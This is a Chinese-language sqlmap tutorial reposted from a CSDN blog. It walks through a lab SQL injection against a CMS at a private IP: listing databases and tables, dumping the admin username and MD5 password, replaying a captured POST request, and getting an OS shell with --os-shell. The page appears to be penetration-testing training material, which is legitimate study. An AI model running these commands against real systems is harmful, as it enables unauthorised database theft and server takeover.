文章目录 利用sqlmap 注入得到cms网站后台管理员账密获取数据库名称获取cms数据库的表名获取users表中的字段(内容)获取username字段和password字段的内容 salmap破解psot请求数据包salmap
在kali中输入sqlmap命令,打开sqlmap,然后输入下面命令:
sqlmap -u Http://10.9.75.33/cms/show.PHP?id=33 --dbs --batch
结果如下:
输入下面命令:
sqlmap -u http://10.9.75.33/cms/show.php?id=33 --dbs -D “cms” --tables --batch
结果如下:
得到cms中的所有表名
输入下面命令:
sqlmap -u http://10.9.75.33/cms/show.php?id=33 -D “cms” -T “cms_users” --columns --batch
结果如下,users表中有三个字段:
即获取账号密码,输入下面命令:
sqlmap -u http://10.9.75.33/cms/show.php?id=33 -D "cms" -T "cms_users" -C "username,password" --dump
在弹出的两次交互信息中输入n,得到账号和md5密码密文:
口算md5密文(其实是用工具解密),得到用户名和密码:
admin
123456
在后台网页用火狐代理、bp抓包,在http history中查看抓到的数据包,将抓到的post请求包复制
输入下面命令,在tmp目录下新建一个txt文件并用vim编辑器编辑,将post数据包的内容放入txt文件中:
touch /tmp/post.txt
vim /tmp/post.txt
命令模式下保存退出
输入下面命令破解post请求包:
salmap -r /tmp/post.txt
在交互式命令时回车,是否追踪302输入no:
耐心等待完成,显示了两种注入方法,报错注入和布尔盲注:
爆破密码:
sqlmap -r /tmp/post.txt -D "cms" -T "cms_users" -C "username,password" --dump
爆破成功:
在kali控制台输入下面命令:
sqlmap -u "http://10.9.75.33/cms/show.php?id=33" --os-shell
选择语言:
选择路径,2是自选路径,选择2:
路径填:
c:/phpstudy/www/
获取成功:
来源地址:https://blog.csdn.net/m0_56578216/article/details/132484191
--结束END--
本文标题: SQLmap使用
本文链接: https://lsjlt.com/news/382600.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-03-01
2024-03-01
2024-03-01
2024-03-01
2024-03-01
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0